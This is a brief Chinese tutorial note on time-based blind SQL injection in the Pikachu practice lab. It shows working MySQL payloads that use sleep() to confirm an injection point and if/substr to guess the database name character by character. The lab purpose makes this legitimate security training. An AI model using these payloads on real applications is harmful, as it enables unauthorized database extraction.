pikachu sql inject 时间盲注
输入框输入任何消息返回内容都是一样的
那么可以考虑插入sleep函数来观察响应时长来判断是否有注入点
输入
kobe' and sleep(3) #
发现页面缓冲3秒才响应,说明确实是注入点
通过if 判断条件为true,来执行sleep五秒,来判断if的条件是否正确
kobe' and if((substr(database(),1,1))='p',sleep(5),null)#
sleep函数来观察响应时长来判断是否有注入点kobe' and sleep(3) #
kobe' and if((substr(database(),1,1))='p',sleep(5),null)#
p
浙公网安备 33010602011771号